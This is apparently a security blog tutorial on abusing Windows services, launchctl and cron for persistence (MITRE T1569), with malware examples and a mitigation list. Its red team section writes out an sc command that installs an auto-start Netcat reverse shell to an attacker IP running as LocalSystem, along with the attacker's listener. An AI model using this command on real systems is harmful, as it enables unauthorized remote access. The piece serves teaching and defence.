Abusing System Services [T1569] to maintain persistance
Before the period of automation people started spending their time on manual works, like checking for updates, monthly/weekly backup etc, after the evolution of system services, corns and Launchctl, they brought a solution to the manual works and it has been considered as an evolution of automation.
Even though these techniques will result in automation it seems to the most vulnerable thing to be exploited among the attackers. Adversaries usually target this type of automation on various platforms to intruder into the internal network, still, it’s been most difficult among many security professionals to apply mitigation and detection to these types of attacks,
What is System service?
System service is the special program which typically executes Windows operating system loads, which typically runs automatically and continuously on the background [without user interaction] when the user has been logged in to their system.
Adversaries may abuse the system service to execute some malicious commands or programs like deploying backdoor or execute PowerShell commands etc, it been more difficult to detect because all malicious activities function in the background even the system user cant found any changes.
A crafted malicious system-level processes get repeatedly executed, it will keep on executing at the background and wasting your resources and slowing your computer down, it could be the gateway for the attacker to execute some malicious commands, when the attacker gets the initial access he/she need some medium to execute some malicious command, System service act as an intermediate between the attacker and victim,
What is SYSTEM32 ?
System32 directory is located in either C:\Windows\System32. Is a directory which stores all the windows system files and software program files, The most common types of files found in the system32 directory are DLL (Dynamic Link Library) and EXE (executable) files.
By default all the system service files have been store in system32,
According to MITRE ATTACK framework system service [T1569] falls under the Execution phase, these result in adversary-controlled code running on a local or remote system.
Service execution [T1569.002]
Adversaries tend to create some malicious service on the target system, which get continuously executed when the users turn on the machine, system service is built-in functionalities in Windows operating system, there are some predefined command for creating and configuring services list of some system service commands
- sc config //Configures service startup and login accounts
- sc continue //Resumes a paused service
- sc enumdepend //Lists the services that cannot run unless the specified service is running
- sc failure //Specifies what action to take upon failure of the service
- sc pause //Pauses a service
launchctl is a built-in MAC os utility that runs processes on your system at a scheduled time, launchctl differentiates between agents and daemons, they are the two main components
By loading or reloading Agents or Daemons, adversaries can install persistence or execute changes they made, they can even abuse functionality to execute code or even bypass some application.
Some of the popular commands in launchctl are defined in the below
- $launchctl list [Getting information about available (loaded) jobs]
- $launchctl list | grep <LABEL> [Getting information about a given job ]
- $ launchctl load /Library/LaunchDaemons/<LABEL>.plist [Loading a job (a global daemon) ]
- $ launchctl unload /Library/LaunchDaemons/<LABEL>.plist [Unloading a job (a global daemon) ]
- $ launchctl start <LABEL> [Starting a job (a loaded job) :]
Cron is time-based job scheduler in Linux operating system where the user can schedule jobs to run periodically at a fixed time, data and interval, it requires ROOT privilege, we can automate our work based on the time for every hour, every min etc
Example : @monthly /home/sample/bin/tape-backup //Backup
Crons can be configured in accordance with year, month, date and time its periodically execute based on the user-defined rules,
Threat Vulnerability and Impact
let us discuss the threat vulnerability and its impacts
Vulnerability: Excess of privilege
Impact: Execution of malicious command or privilege escalation or gain persistence, Backdoors
Backdoors are generally classified as a TROJAN, A Trojan is some malicious computer program pretending to something legitimate, if the targeted victim downloads or execute the program, he/she gets affected with some malicious service which actually executes at the background, it acts as intermediate between the attacker and the victim,
SRVHOST is a type of trojan which typically runs on the background and consumes a lot of RAM, it’s been more difficult to identify, even some malware like
Wacatac is used as a backdoor where the attackers can steal some confidential information like password, etc,
List of some Top Backdoor
Lets us list some top 10 commonly used backdoor by the attackers
The above mention are some malicious windows backdoor, if your system has been affected by any of the backdoors you can make a observe on windows service, it will continuously keep on running on the background service, some of the services would actually be a legitimate one, for example when you run a windows office by default ctfmon.exe will starts to execute, but it runs in the background, even after you quit all Office programs seems to be backdoor.
In August 2012, an attack campaign known as Shamoon targeted a Saudi Arabian energy company to deliver a malware called Disttrack, Disttrack is a multipurpose tool that exhibits worm-like behaviour by attempting to spread to other systems on a local network using stolen administrator credentials. More importantly, its claim to fame is the ability to destroy data and to render infected systems unusable. The attack four years ago resulted in 30,000 or more systems being damaged.
Disttrack is mainly focused on data destruction and attempting to damage as many systems as possible. To do so, this malware attempts to spread to other systems on the network using what is likely stolen administrator credentials.
BBSRAT is typically packaged within a portable executable file, although in a few of the observed instances, a raw DLL was discovered to contain BBSRAT. When the dropper first runs, it will generate a path in the %TEMP% directory. The generated filename is 10-16 uppercase alphabetic characters, and ends with a ‘.TMP’ file extension. The dropper will continue to write an embedded cab file in this location.
The malware will proceed to create one of the following directories depending on what version of Microsoft Windows is running on the target machine:
- %ALLUSERSPROFILE%\Application Data\SSONSVR
In order to ensure persistence, the following registry key is written on the victim’s machine
In this scenario attacker tries to establishing reverse connectivity between the target system, by creating some backdoor services using Netcat, generally, this backdoor gets executed when the system gets logged on, it does not require any authentication,
- When the Adversaries successfully get intrude into the internal network
- Later the attacker creates some malicious backdoor on the target system, which gets executed continuously and frequently when the user get logged on
- In this attack scenario, Adversaries create some malicious Netcat command which establishes a reverse connection between the attacker and the victim, to maintains the persistence with the target system
Red team : Attack scenario
Attacker IP: 192.168.43.87
Target IP: 192.168.43.163
Let us assume that the attacker successfully gains initial access of the target system like getting the RDI or SSH access, he/she deploy some system service on the target machine, which typically establish a reverse connection to the attacker system
Note: this command need administrative privilege
C:\> sc create evil binpath= “c:\tools\nc 192.168.43.87 4444 -e cmd.exe” start= “auto” obj= “LocalSystem” password= “”
Using the inbuilt sc command we have created the Netcat service which establishes as a connection to 192.168.43.87 on port 4444
Note: Netcat is a network utility, used for establishing a TCP/UDP connectivity, Netcat can be used as a port scanner, a backdoor, a port redirector, a port listener and lots of other cool things too.
Step : 2
We can observe that service named evil has been running as a background service
nc -lvp 4444
The attacker keep on listen to the port 4444 when the target get logged on to the system the malicious service name “evil” gets automatically executed and open a connection at port 4444,
The adversary can successfully execute some malicious code running on a local or remote system. Which may result in taking over the entire server and even escalating privileges.
- Antivirus and antimalware: using some advanced antivirus and antimalware software helps you to prevent malicious activities,
- Regular system audit: Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
- Update patches: Perform regular software updates to mitigate exploitation risk.
- User account management: Configure Windows User Account Control to mitigate the risk of adversaries obtaining elevated process access
- Restrict files and directory permission
- Privilege account management
- Limited access: Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include the use of network concentrators, RDP gateways, etc.
System services are one of the attacking techniques that the MITRE ATT&CK Matrix lists as an Execution technique. it provides the attacker with unauthorized remote access to a compromised PC